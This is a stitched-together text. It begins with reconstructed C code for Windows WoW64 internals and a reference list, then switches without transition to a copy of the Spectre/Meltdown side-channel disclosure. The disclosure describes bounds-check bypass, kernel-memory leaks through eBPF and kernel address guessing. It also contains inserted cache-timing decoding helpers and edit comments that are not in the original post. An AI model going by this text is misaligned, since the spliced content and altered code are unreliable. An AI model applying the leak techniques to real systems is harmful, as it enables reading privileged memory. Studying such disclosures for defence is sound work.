PVOID PsWowX86SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowX86Exports[] = {
    { "LdrInitializeThunk",
      &PsWowX86SharedInformation[SharedNtdll32LdrInitializeThunk] },
    { "KiUserExceptionDispatcher",
      &PsWowX86SharedInformation[SharedNtdll32KiUserExceptionDispatcher] },
    { "KiUserApcDispatcher",
      &PsWowX86SharedInformation[SharedNtdll32KiUserApcDispatcher] },
    { "KiUserCallbackDispatcher",
      &PsWowX86SharedInformation[SharedNtdll32KiUserCallbackDispatcher] },
    { "RtlUserThreadStart",
      &PsWowX86SharedInformation[SharedNtdll32RtlUserThreadStart] },
    { "RtlpQueryProcessDebugInformationRemote",
      &PsWowX86SharedInformation[SharedNtdll32pQueryProcessDebugInformationRemote] },
    { "LdrSystemDllInitBlock",
      &PsWowX86SharedInformation[SharedNtdll32LdrSystemDllInitBlock] },
    { "RtlpFreezeTimeBias",
      &PsWowX86SharedInformation[SharedNtdll32RtlpFreezeTimeBias] },
};
#ifdef _M_ARM64
PVOID PsWowArm32SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowArm32Exports[] = {
//
// …
//
};
PVOID PsWowAmd64SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowAmd64Exports[] = {
//
// …
//
};
PVOID PsWowChpeX86SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowChpeX86Exports[] = {
//
// …
//
};
#endif // _M_ARM64
//
// …
//
typedef struct _PS_NTDLL_EXPORT_INFORMATION {
PPS_NTDLL_EXPORT_ITEM NtdllExports;
SIZE_T Count;
} PS_NTDLL_EXPORT_INFORMATION, *PPS_NTDLL_EXPORT_INFORMATION;
//
// RTL_NUMBER_OF(NtdllExportInformation)
// == 6
// == (SYSTEM_DLL_TYPE)PsSystemDllTotalTypes
//
PS_NTDLL_EXPORT_INFORMATION NtdllExportInformation[PsSystemDllTotalTypes] = {
{ NtdllExports, RTL_NUMBER_OF(NtdllExports) },
{ NtdllWowX86Exports, RTL_NUMBER_OF(NtdllWowX86Exports) },
#ifdef _M_ARM64
{ NtdllWowArm32Exports, RTL_NUMBER_OF(NtdllWowArm32Exports) },
{ NtdllWowAmd64Exports, RTL_NUMBER_OF(NtdllWowAmd64Exports) },
{ NtdllWowChpeX86Exports, RTL_NUMBER_OF(NtdllWowChpeX86Exports) },
#endif // _M_ARM64
//
// { NULL, 0 } for the rest…
//
};
typedef struct _PS_SYSTEM_DLL_INFO {
//
// Flags.
// Initialized statically.
//
USHORT Flags;
//
// Machine type of this WoW64 NTDLL.
// Initialized statically.
// Examples:
// — IMAGE_FILE_MACHINE_I386
// — IMAGE_FILE_MACHINE_ARMNT
//
USHORT MachineType;
//
// Unused, always 0.
//
ULONG Reserved1;
//
// Path to the WoW64 NTDLL.
// Initialized statically.
// Examples:
// - "\\SystemRoot\\SysWOW64\\ntdll.dll"
// - "\\SystemRoot\\SysArm32\\ntdll.dll"
//
UNICODE_STRING Ntdll32Path;
//
// Image base of the DLL.
// Initialized at runtime by PspMapSystemDll.
// Equivalent of:
// RtlImageNtHeader(BaseAddress)->
// OptionalHeader.ImageBase;
//
PVOID ImageBase;
//
// Contains DLL name (such as "ntdll.dll" or
// "ntdll32.dll") before runtime initialization.
// Initialized at runtime by MmMapViewOfSectionEx,
// called from PspMapSystemDll.
//
union {
PVOID BaseAddress;
PWCHAR DllName;
};
//
// Unused, always 0.
//
PVOID Reserved2;
//
// Section relocation information.
//
PVOID SectionRelocationInformation;
//
// Unused, always 0.
//
PVOID Reserved3;
} PS_SYSTEM_DLL_INFO, *PPS_SYSTEM_DLL_INFO;
typedef struct _PS_SYSTEM_DLL {
//
// _SECTION* object of the DLL.
// Initialized at runtime by PspLocateSystemDll.
//
union {
EX_FAST_REF SectionObjectFastRef;
PVOID SectionObject;
};
//
// Push lock.
//
EX_PUSH_LOCK PushLock;
//
// System DLL information.
// This part is returned by PsQuerySystemDllInfo.
//
PS_SYSTEM_DLL_INFO SystemDllInfo;
} PS_SYSTEM_DLL, *PPS_SYSTEM_DLL;
////////////////////////////////////////////////////////////////////////////////
// ntdll.dll
////////////////////////////////////////////////////////////////////////////////
ULONG
RtlpArchContextFlagFromMachine(
_In_ USHORT MachineType
)
/*++
Routine description:
    This routine translates the machine type to the
    architecture-specific CONTEXT flag.
Arguments:
    MachineType - One of IMAGE_FILE_MACHINE_* values.
Return Value:
    Context flag.
Note:
    RtlpArchContextFlagFromMachine can be found only in
    ntoskrnl.exe symbols, but from ntdll.dll disassembly
    it is obvious that this function is present there
    as well (probably __forceinline'd, or used as a macro).
--*/
{
switch (MachineType)
{
case IMAGE_FILE_MACHINE_I386:
return CONTEXT_i386;
case IMAGE_FILE_MACHINE_AMD64:
return CONTEXT_AMD64;
case IMAGE_FILE_MACHINE_ARMNT:
return CONTEXT_ARM;
case IMAGE_FILE_MACHINE_ARM64:
return CONTEXT_ARM64;
default:
return 0;
}
}
ULONG
RtlpGetLegacyContextLength(
_In_ ULONG ArchContextFlag,
_Out_opt_ PULONG SizeOfContext,
_Out_opt_ PULONG AlignOfContext
)
/*++
Routine description:
    This routine determines size and alignment of the
    architecture-specific CONTEXT structure.
Arguments:
    ArchContextFlag - Architecture-specific CONTEXT flag.
    SizeOfContext - Receives sizeof(CONTEXT).
    AlignOfContext - Receives __alignof(CONTEXT).
Return Value:
    Alignment of the CONTEXT structure.
Note:
    You can find corresponding DECLSPEC_ALIGN specifiers
    for each CONTEXT structure in the winnt.h (Windows SDK).
    By WOW64_CONTEXT_* here is meant an original CONTEXT
    structure for the specific architecture (as CONTEXT
    structures for other architectures are not available,
    because it is selected during compile-time).
--*/
{
ULONG SizeOf = 0;
ULONG AlignOf = 0;
switch (ArchContextFlag)
{
case CONTEXT_i386:
SizeOf = sizeof(WOW64_CONTEXT_i386);
AlignOf = __alignof(WOW64_CONTEXT_i386); // 4
break;
case CONTEXT_AMD64:
SizeOf = sizeof(WOW64_CONTEXT_AMD64);
AlignOf = __alignof(WOW64_CONTEXT_AMD64); // 16
break;
case CONTEXT_ARM:
SizeOf = sizeof(WOW64_CONTEXT_ARM);
AlignOf = __alignof(WOW64_CONTEXT_ARM); // 8
break;
case CONTEXT_ARM64:
SizeOf = sizeof(WOW64_CONTEXT_ARM64);
AlignOf = __alignof(WOW64_CONTEXT_ARM64); // 16
break;
}
if (SizeOfContext) {
*SizeOfContext = SizeOf;
}
if (AlignOfContext) {
*AlignOfContext = AlignOf;
}
return AlignOf;
}
PULONG
RtlpGetContextFlagsLocation(
_In_ PCONTEXT_UNION Context,
_In_ ULONG ArchContextFlag
)
/*++
Routine description:
    This routine returns a pointer to the "ContextFlags"
    member of the CONTEXT structure.
Arguments:
    Context - Architecture-specific CONTEXT structure.
    ArchContextFlag - Architecture-specific CONTEXT flag.
Return Value:
    Pointer to the "ContextFlags" member.
--*/
{
//
// ContextFlags is always the first member of the
// CONTEXT struct — except for AMD64.
//
switch (ArchContextFlag)
{
case CONTEXT_i386:
return &Context->X86.ContextFlags; // Context + 0x00
case CONTEXT_AMD64:
return &Context->X64.ContextFlags; // Context + 0x30
case CONTEXT_ARM:
return &Context->ARM.ContextFlags; // Context + 0x00
case CONTEXT_ARM64:
return &Context->ARM64.ContextFlags; // Context + 0x00
default:
//
// Assume first member (Context + 0x00).
//
return (PULONG)Context;
}
}
//
// Architecture-specific WoW64 structure,
// holding the machine type and context
// structure.
//
#define WOW64_CPURESERVED_FLAG_RESET_STATE 1
typedef struct _WOW64_CPURESERVED {
USHORT Flags;
USHORT MachineType;
//
// CONTEXT has different alignment for
// each architecture and its location
// is determined at runtime (see
// RtlWow64GetCpuAreaInfo below).
//
// CONTEXT Context;
// CONTEXT_EX ContextEx;
//
} WOW64_CPURESERVED, *PWOW64_CPURESERVED;
typedef struct _WOW64_CPU_AREA_INFO {
PCONTEXT_UNION Context;
PCONTEXT_EX ContextEx;
PVOID ContextFlagsLocation;
PWOW64_CPURESERVED CpuReserved;
ULONG ContextFlag;
USHORT MachineType;
} WOW64_CPU_AREA_INFO, *PWOW64_CPU_AREA_INFO;
NTSTATUS
RtlWow64GetCpuAreaInfo(
_In_ PWOW64_CPURESERVED CpuReserved,
_In_ ULONG Reserved,
_Out_ PWOW64_CPU_AREA_INFO CpuAreaInfo
)
/*++
Routine description:
This routine returns architecture- and WoW64-specific
information based on the CPU-reserved region. It is
used mainly for fetching MachineType and the pointer
to the architecture-specific CONTEXT structure (which
is part of the WOW64_CPURESERVED structure). Because
the CONTEXT structure has different size and alignment
for each architecture, the pointer must be obtained
dynamically.
Arguments:
CpuReserved — WoW64 CPU-reserved region, usually located
at NtCurrentTeb()->TlsSlots[/* 1 */ WOW64_TLS_CPURESERVED]
Reserved — Unused. All callers set this argument to 0.
CpuAreaInfo — Receives the CPU-area information.
Return Value:
STATUS_SUCCESS — on success
STATUS_INVALID_PARAMETER — if CpuReserved contains invalid MachineType
*/
{
    ULONG ContextFlag;
    ULONG SizeOfContext;
    ULONG AlignOfContext;
    PCONTEXT_UNION Context; // local introduced so the listing is self-consistent

    //
    // In the ntdll.dll, this call is probably inlined, because
    // RtlpArchContextFlagFromMachine symbol is not present there.
    //
    ContextFlag = RtlpArchContextFlagFromMachine(CpuReserved->MachineType);

    if (!ContextFlag) {
        return STATUS_INVALID_PARAMETER;
    }

    RtlpGetLegacyContextLength(ContextFlag, &SizeOfContext, &AlignOfContext);

    //
    // CpuAreaInfo->Context = &CpuReserved->Context;
    // CpuAreaInfo->ContextEx = &CpuReserved->ContextEx;
    //
    Context = ALIGN_UP_POINTER_BY(
        (PUCHAR)CpuReserved + sizeof(WOW64_CPURESERVED),
        AlignOfContext
        );

    CpuAreaInfo->Context = Context;
    CpuAreaInfo->ContextEx = ALIGN_UP_POINTER_BY(
        (PUCHAR)Context + SizeOfContext + sizeof(CONTEXT_EX),
        sizeof(PVOID)
        );

    //
    // Assumption: the location is obtained via the helper defined above.
    //
    CpuAreaInfo->ContextFlagsLocation = RtlpGetContextFlagsLocation(Context, ContextFlag);
    CpuAreaInfo->CpuReserved = CpuReserved;
    CpuAreaInfo->ContextFlag = ContextFlag;
    CpuAreaInfo->MachineType = CpuReserved->MachineType;

    return STATUS_SUCCESS;
}
////////////////////////////////////////////////////////////////////////////////
// wow64.dll
////////////////////////////////////////////////////////////////////////////////
//
// WOW64INFO, based on:
// wow64t.h (WRK: https://github.com/mic101/windows/blob/master/WRK-v1.2/public/internal/base/inc/wow64t.h#L269)
//
#define WOW64_CPUFLAGS_MSFT64 0x00000001
#define WOW64_CPUFLAGS_SOFTWARE 0x00000002
typedef struct _WOW64INFO {
ULONG NativeSystemPageSize;
ULONG CpuFlags;
ULONG Wow64ExecuteFlags;
ULONG Unknown1;
USHORT NativeMachineType;
USHORT EmulatedMachineType;
} WOW64INFO, *PWOW64INFO;
//
// Thread Local Storage (TLS) support. TLS slots are statically allocated.
// wow64tls.h (WRK: https://github.com/mic101/windows/blob/master/WRK-v1.2/public/internal/base/inc/wow64tls.h#L23)
// Note: Probably not all of these names match the ones used on Windows 10.
//
#define WOW64_TLS_STACKPTR64 0 // contains 64-bit stack ptr when simulating 32-bit code
#define WOW64_TLS_CPURESERVED 1 // per-thread data for the CPU simulator
#define WOW64_TLS_INCPUSIMULATION 2 // Set when inside the CPU
#define WOW64_TLS_TEMPLIST 3 // List of memory allocated in thunk call.
#define WOW64_TLS_EXCEPTIONADDR 4 // 32-bit exception address (used during exception unwinds)
#define WOW64_TLS_USERCALLBACKDATA 5 // Used by win32k callbacks
#define WOW64_TLS_EXTENDED_FLOAT 6 // Used in ia64 to pass in floating point
#define WOW64_TLS_APCLIST 7 // List of outstanding usermode APCs
#define WOW64_TLS_FILESYSREDIR 8 // Used to enable/disable the filesystem redirector
#define WOW64_TLS_LASTWOWCALL 9 // Pointer to the last wow call struct (Used when wowhistory is enabled)
#define WOW64_TLS_WOW64INFO 10 // Wow64Info address (structure shared between 32-bit and 64-bit code inside Wow64).
#define WOW64_TLS_INITIAL_TEB32 11 // A pointer to the 32-bit initial TEB
#define WOW64_TLS_PERFDATA 12 // A pointer to temporary timestamps used in perf measurement
#define WOW64_TLS_DEBUGGER_COMM 13 // Communicate with 32bit debugger for event notification
#define WOW64_TLS_INVALID_STARTUP_CONTEXT 14 // Used by IA64 to indicate an invalid startup context. After startup, it stores a pointer to the context.
#define WOW64_TLS_SLIST_FAULT 15 // Used to retry RtlpInterlockedPopEntrySList faults
#define WOW64_TLS_UNWIND_NATIVE_STACK 16 // Forces an unwind of the native 64-bit stack after an APC
#define WOW64_TLS_APC_WRAPPER 17 // Holds the Wow64 APC jacket routine
#define WOW64_TLS_IN_SUSPEND_THREAD 18 // Indicates the current thread is in the middle of NtSuspendThread. Used by software CPUs.
#define WOW64_TLS_MAX_NUMBER 19 // Maximum number of TLS slot entries to allocate
typedef struct _WOW64_ERROR_CASE {
ULONG Case;
NTSTATUS TransformedStatus;
} WOW64_ERROR_CASE, *PWOW64_ERROR_CASE;
typedef struct _WOW64_SERVICE_TABLE_DESCRIPTOR {
//
// struct _KSERVICE_TABLE_DESCRIPTOR {
//
// //
// // Pointer to a system call table (array of function pointers).
// //
//
// PULONG_PTR Base;
//
// //
// // Pointer to a system call count table.
// // This field has been set only on checked (debug) builds,
// // where the Count (with the corresponding system call index)
// // has been incremented with each system call.
// // On non-checked builds it is set to NULL.
// //
//
// PULONG Count;
//
// //
// // Maximum number of items in the system call table.
// // In ntoskrnl.exe it corresponds with the actual number
// // of system calls. In wow64.dll it is set to 4096.
// //
//
// ULONG Limit;
//
// //
// // Pointer to a system call argument table.
// // The elements in this table actually contain how many
// // bytes on the stack are assigned to the function parameters
// // for a particular system call.
// // On 32-bit systems, if you divide this number by 4, you’ll
// // get the number of arguments that the system call expects.
// //
//
// PUCHAR Number;
// };
//
KSERVICE_TABLE_DESCRIPTOR Descriptor;
//
// Extended fields of the WoW64 service table:
// Wow64HandleSystemServiceError
//
WOW64_ERROR_CASE ErrorCaseDefault;
PWOW64_ERROR_CASE ErrorCase;
} WOW64_SERVICE_TABLE_DESCRIPTOR, *PWOW64_SERVICE_TABLE_DESCRIPTOR;
#define WOW64_NTDLL_SERVICE_INDEX 0
#define WOW64_WIN32U_SERVICE_INDEX 1
#define WOW64_KERNEL32_SERVICE_INDEX 2
#define WOW64_USER32_SERVICE_INDEX 3
#define WOW64_SERVICE_TABLE_MAX 4
WOW64_SERVICE_TABLE_DESCRIPTOR ServiceTables[WOW64_SERVICE_TABLE_MAX];
typedef struct _WOW64_LOG_SERVICE
{
PVOID Reserved;
PULONG Arguments;
ULONG ServiceTable;
ULONG ServiceNumber;
NTSTATUS Status;
BOOLEAN PostCall;
} WOW64_LOG_SERVICE, *PWOW64_LOG_SERVICE;
NTSTATUS
Wow64HandleSystemServiceError(
_In_ NTSTATUS ExceptionStatus,
_In_ PWOW64_LOG_SERVICE LogService
)
/*++
Routine description:
    This routine transforms exception from native system
    call to WoW64-compatible NTSTATUS.
Arguments:
    ExceptionStatus - NTSTATUS raised from executing system call.
    LogService - Information about the WoW64 system call.
Return Value:
    Transformed NTSTATUS.
--*/
{
PWOW64_SERVICE_TABLE_DESCRIPTOR ServiceTable;
PWOW64_ERROR_CASE ErrorCaseTable;
ULONG ErrorCase;
NTSTATUS TransformedStatus;
ErrorCaseTable = ServiceTables[LogService->ServiceTable].ErrorCase;
if (!ErrorCaseTable)
{
ErrorCaseTable = &ServiceTables[LogService->ServiceTable].ErrorCaseDefault;
}
ErrorCase = ErrorCaseTable[LogService->ServiceNumber].Case;
TransformedStatus = ErrorCaseTable[LogService->ServiceNumber].TransformedStatus;
switch (ErrorCase)
{
case 0:
return ExceptionStatus;
case 1:
NtCurrentTeb()->LastErrorValue = RtlNtStatusToDosError(ExceptionStatus);
return ExceptionStatus;
case 2:
return TransformedStatus;
case 3:
NtCurrentTeb()->LastErrorValue = RtlNtStatusToDosError(ExceptionStatus);
return TransformedStatus;
default:
return STATUS_INVALID_PARAMETER;
}
}

References

How does one retrieve the 32-bit context of a Wow64 program from a 64-bit process on Windows Server 2003 x64?
http://www.nynaeve.net/?p=191

Mixing x86 with x64 code
http://blog.rewolf.pl/blog/?p=102

Windows 10 on ARM
https://channel9.msdn.com/Events/Build/2017/P4171

Knockin’ on Heaven’s Gate – Dynamic Processor Mode Switching
http://rce.co/knockin-on-heavens-gate-dynamic-processor-mode-switching/

Closing “Heaven’s Gate”
http://www.alex-ionescu.com/?p=300


Reading privileged memory with a side-channel

We have discovered that CPU data cache timing can be abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual memory read vulnerabilities across local security boundaries in various contexts.

 

Variants of this issue are known to affect many modern processors, including certain processors by Intel, AMD and ARM. For a few Intel and AMD CPU models, we have exploits that work against real software. We reported this issue to Intel, AMD and ARM on 2017-06-01 [1].

 

So far, there are three known variants of the issue:

 

  • Variant 1: bounds check bypass (CVE-2017-5753)
  • Variant 2: branch target injection (CVE-2017-5715)
  • Variant 3: rogue data cache load (CVE-2017-5754)

 

Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at:

 

 

During the course of our research, we developed the following proofs of concept (PoCs):

 

  1. A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.
  2. A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel’s BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]
  3. A PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian’s distro kernel [5] running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should be much faster, but that hasn’t been tested.)
  4. A PoC for variant 3 that, when running with normal user privileges, can read kernel memory on the Intel Haswell Xeon CPU under some precondition. We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

 

For interesting resources around this topic, look down into the «Literature» section.

 

A warning regarding explanations about processor internals in this blogpost: This blogpost contains a lot of speculation about hardware internals based on observed behavior, which might not necessarily correspond to what processors are actually doing.

 

We have some ideas on possible mitigations and provided some of those ideas to the processor vendors; however, we believe that the processor vendors are in a much better position than we are to design and evaluate mitigations, and we expect them to be the source of authoritative guidance.

 

The PoC code and the writeups that we sent to the CPU vendors are available here: https://bugs.chromium.org/p/project-zero/issues/detail?id=1272.

Tested Processors

  • Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called «Intel Haswell Xeon CPU» in the rest of this document)
  • AMD FX(tm)-8320 Eight-Core Processor (called «AMD FX CPU» in the rest of this document)
  • AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called «AMD PRO CPU» in the rest of this document)
  • An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called «ARM Cortex A57» in the rest of this document)

Glossary

retire: An instruction retires when its results, e.g. register writes and memory writes, are committed and made visible to the rest of the system. Instructions can be executed out of order, but must always retire in order.

 

logical processor core: A logical processor core is what the operating system sees as a processor core. With hyperthreading enabled, the number of logical cores is a multiple of the number of physical cores.

 

cached/uncached data: In this blogpost, «uncached» data is data that is only present in main memory, not in any of the cache levels of the CPU. Loading uncached data will typically take over 100 cycles of CPU time.

 

speculative execution: A processor can execute past a branch without knowing whether it will be taken or where its target is, therefore executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.

 

mis-speculation window: The time window during which the CPU speculatively executes the wrong code and has not yet detected that mis-speculation has occurred.

Variant 1: Bounds check bypass

This section explains the common theory behind all three variants and the theory behind our PoC for variant 1 that, when running in userspace under a Debian distro kernel, can perform arbitrary reads in a 4GiB region of kernel memory in at least the following configurations:

 

  • Intel Haswell Xeon CPU, eBPF JIT is off (default state)
  • Intel Haswell Xeon CPU, eBPF JIT is on (non-default state)
  • AMD PRO CPU, eBPF JIT is on (non-default state)

 

The state of the eBPF JIT can be toggled using the net.core.bpf_jit_enable sysctl.

Theoretical explanation

The Intel Optimization Reference Manual says the following regarding Sandy Bridge (and later microarchitectural revisions) in section 2.3.2.3 («Branch Prediction»):

 

Branch prediction predicts the branch target and enables the
processor to begin executing instructions long before the branch
true execution path is known.

 

In section 2.3.5.2 («L1 DCache»):

 

Loads can:
[…]
  • Be carried out speculatively, before preceding branches are resolved.
  • Take cache misses out of order and in an overlapped manner.

 

Intel’s Software Developer’s Manual [7] states in Volume 3A, section 11.7 («Implicit Caching (Pentium 4, Intel Xeon, and P6 family processors)»):

 

Implicit caching occurs when a memory element is made potentially cacheable, although the element may never have been accessed in the normal von Neumann sequence. Implicit caching occurs on the P6 and more recent processor families due to aggressive prefetching, branch prediction, and TLB miss handling. Implicit caching is an extension of the behavior of existing Intel386, Intel486, and Pentium processor systems, since software running on these processor families also has not been able to deterministically predict the behavior of instruction prefetch.

Consider the code sample below. If arr1->length is uncached, the processor can speculatively load data from arr1->data[untrusted_offset_from_caller]. This is an out-of-bounds read. That should not matter because the processor will effectively roll back the execution state when the branch has executed; none of the speculatively executed instructions will retire (e.g. cause registers etc. to be affected).

 

struct array {
 unsigned long length;
 unsigned char data[];
};
struct array *arr1 = …;
unsigned long untrusted_offset_from_caller = …;
if (untrusted_offset_from_caller < arr1->length) {
 unsigned char value = arr1->data[untrusted_offset_from_caller];
 …
}

However, in the following code sample, there’s an issue. If arr1->length, arr2->data[0x200] and arr2->data[0x300] are not cached, but all other accessed data is, and the branch conditions are predicted as true, the processor can do the following speculatively before arr1->length has been loaded and the execution is re-steered:

 

  • load value = arr1->data[untrusted_offset_from_caller]
  • start a load from a data-dependent offset in arr2->data, loading the corresponding cache line into the L1 cache

 

struct array {
 unsigned long length;
 unsigned char data[];
};
struct array *arr1 = …; /* small array */
struct array *arr2 = …; /* array of size 0x400 */
/* >0x400 (OUT OF BOUNDS!) */
unsigned long untrusted_offset_from_caller = …;
if (untrusted_offset_from_caller < arr1->length) {
 unsigned char value = arr1->data[untrusted_offset_from_caller];
 unsigned long index2 = ((value&1)*0x100)+0x200;
 if (index2 < arr2->length) {
   unsigned char value2 = arr2->data[index2];
 }
}

 

After the execution has been returned to the non-speculative path because the processor has noticed that untrusted_offset_from_caller is bigger than arr1->length, the cache line containing arr2->data[index2] stays in the L1 cache. By measuring the time required to load arr2->data[0x200] and arr2->data[0x300], an attacker can then determine whether the value of index2 during speculative execution was 0x200 or 0x300, which discloses whether arr1->data[untrusted_offset_from_caller]&1 is 0 or 1.
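
As a minimal sketch of that final decoding step, assume the attacker has already timed one load from each of the two probe lines. The helpers below map those two latencies back to the leaked bit. The names probe_index_for and infer_leaked_bit and the threshold parameter are illustrative assumptions and not part of the PoC; a real measurement would additionally need a platform-specific cycle counter and a way to evict the probe lines beforehand.

```c
#include <assert.h>
#include <stdint.h>

/* Index into arr2->data chosen by the low bit of the speculatively read
 * byte; this mirrors the index2 expression in the sample above. */
unsigned long probe_index_for(unsigned char value)
{
    return ((unsigned long)(value & 1) * 0x100) + 0x200;
}

/* Hypothetical decoder: given the measured load latencies of
 * arr2->data[0x200] and arr2->data[0x300], return the leaked bit.
 * Returns -1 when both or neither line looks cached, in which case the
 * measurement carries no information and should be repeated. */
int infer_leaked_bit(uint64_t cycles_0x200, uint64_t cycles_0x300,
                     uint64_t cached_threshold)
{
    assert(cached_threshold > 0);

    int hit_0x200 = cycles_0x200 < cached_threshold;
    int hit_0x300 = cycles_0x300 < cached_threshold;

    if (hit_0x200 == hit_0x300)
        return -1;
    return hit_0x300 ? 1 : 0;
}
```

The threshold has to be calibrated per machine; the glossary's figure of over 100 cycles for an uncached load only gives a rough starting point.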

 

To be able to actually use this behavior for an attack, an attacker needs to be able to cause the execution of such a vulnerable code pattern in the targeted context with an out-of-bounds index. For this, the vulnerable code pattern must either be present in existing code, or there must be an interpreter or JIT engine that can be used to generate the vulnerable code pattern. So far, we have not actually identified any existing, exploitable instances of the vulnerable code pattern; the PoC for leaking kernel memory using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the kernel and accessible to normal users.

 

A minor variant of this could be to instead use an out-of-bounds read to a function pointer to gain control of execution in the mis-speculated path. We did not investigate this variant further.

Attacking the kernel

This section describes in more detail how variant 1 can be used to leak Linux kernel memory using the eBPF bytecode interpreter and JIT engine. While there are many interesting potential targets for variant 1 attacks, we chose to attack the Linux in-kernel eBPF JIT/interpreter because it provides more control to the attacker than most other JITs.

 

The Linux kernel has supported eBPF since version 3.18. Unprivileged userspace code can supply bytecode to the kernel that is verified by the kernel and then:

 

  • either interpreted by an in-kernel bytecode interpreter
  • or translated to native machine code that also runs in kernel context using a JIT engine (which translates individual bytecode instructions without performing any further optimizations)

 

Execution of the bytecode can be triggered by attaching the eBPF bytecode to a socket as a filter and then sending data through the other end of the socket.

 

Whether the JIT engine is enabled depends on a run-time configuration setting, but at least on the tested Intel processor, the attack works independently of that setting.

 

Unlike classic BPF, eBPF has data types like data arrays and function pointer arrays into which eBPF bytecode can index. Therefore, it is possible to create the code pattern described above in the kernel using eBPF bytecode.

 

eBPF’s data arrays are less efficient than its function pointer arrays, so the attack will use the latter where possible.

 

Both machines on which this was tested have no SMAP, and the PoC relies on that (but it shouldn’t be a precondition in principle).

 

Additionally, at least on the Intel machine on which this was tested, bouncing modified cache lines between cores is slow, apparently because the MESI protocol is used for cache coherence [8]. Changing the reference counter of an eBPF array on one physical CPU core causes the cache line containing the reference counter to be bounced over to that CPU core, making reads of the reference counter on all other CPU cores slow until the changed reference counter has been written back to memory. Because the length and the reference counter of an eBPF array are stored in the same cache line, this also means that changing the reference counter on one physical CPU core causes reads of the eBPF array’s length to be slow on other physical CPU cores (intentional false sharing).

 

The attack uses two eBPF programs. The first one tail-calls through a page-aligned eBPF function pointer array prog_map at a configurable index. In simplified terms, this program is used to determine the address of prog_map by guessing the offset from prog_map to a userspace address and tail-calling through prog_map at the guessed offsets. To cause the branch prediction to predict that the offset is below the length of prog_map, tail calls to an in-bounds index are performed in between. To increase the mis-speculation window, the cache line containing the length of prog_map is bounced to another core. To test whether an offset guess was successful, it can be tested whether the userspace address has been loaded into the cache.

 

Because such straightforward brute-force guessing of the address would be slow, the following optimization is used: 2^15 adjacent userspace memory mappings [9], each consisting of 2^4 pages, are created at the userspace address user_mapping_area, covering a total area of 2^31 bytes. Each mapping maps the same physical pages, and all mappings are present in the pagetables.

 

 

 

This permits the attack to be carried out in steps of 2^31 bytes. For each step, after causing an out-of-bounds access through prog_map, only one cache line from each of the first 2^4 pages of user_mapping_area has to be tested for cached memory. Because the L3 cache is physically indexed, any access to a virtual address mapping a physical page will cause all other virtual addresses mapping the same physical page to become cached as well.

 

When this attack finds a hit—a cached memory location—the upper 33 bits of the kernel address are known (because they can be derived from the address guess at which the hit occurred), and the low 16 bits of the address are also known (from the offset inside user_mapping_area at which the hit was found). The remaining part of the address of user_mapping_area is the middle.
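
The bit accounting can be checked with a small sketch. It assumes 4 KiB pages, so that 2^4 pages per mapping give 16 low bits and 2^15 mappings give a 2^31-byte area; the macro and function names are illustrative and do not come from the PoC.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_BYTES_LOG2     12u /* assumption: 4 KiB pages */
#define MAPPING_PAGES_LOG2   4u /* 2^4 pages per mapping */
#define MAPPING_COUNT_LOG2  15u /* 2^15 adjacent mappings */

/* 16 low bits are fixed by the offset of the hit inside one mapping. */
#define LOW_BITS  (MAPPING_PAGES_LOG2 + PAGE_BYTES_LOG2)
/* The whole area spans 2^31 bytes, so one guess fixes the top 33 bits. */
#define AREA_BITS (MAPPING_COUNT_LOG2 + LOW_BITS)

struct address_parts {
    uint64_t upper;  /* 33 bits, known from the guess that produced the hit */
    uint64_t middle; /* 15 bits, still unknown after the first hit */
    uint64_t lower;  /* 16 bits, known from the offset of the hit */
};

/* Split a 64-bit address into the three fields described above. */
struct address_parts split_address(uint64_t addr)
{
    struct address_parts p;
    p.lower  = addr & ((UINT64_C(1) << LOW_BITS) - 1);
    p.middle = (addr >> LOW_BITS) & ((UINT64_C(1) << MAPPING_COUNT_LOG2) - 1);
    p.upper  = addr >> AREA_BITS;
    return p;
}

/* Reassemble an address once all three fields are known. */
uint64_t join_address(struct address_parts p)
{
    assert(p.lower < (UINT64_C(1) << LOW_BITS));
    assert(p.middle < (UINT64_C(1) << MAPPING_COUNT_LOG2));
    return (p.upper << AREA_BITS) | (p.middle << LOW_BITS) | p.lower;
}
```

The 15 unknown middle bits correspond exactly to the 2^15 mappings that all alias the same physical pages, which is why a single hit cannot tell them apart.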

 

 

 

The remaining bits in the middle can be determined by bisecting the remaining address space: Map two physical pages to adjacent ranges of virtual addresses, each virtual address range the size of half of the remaining search space, then determine the remaining address bit-wise.
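
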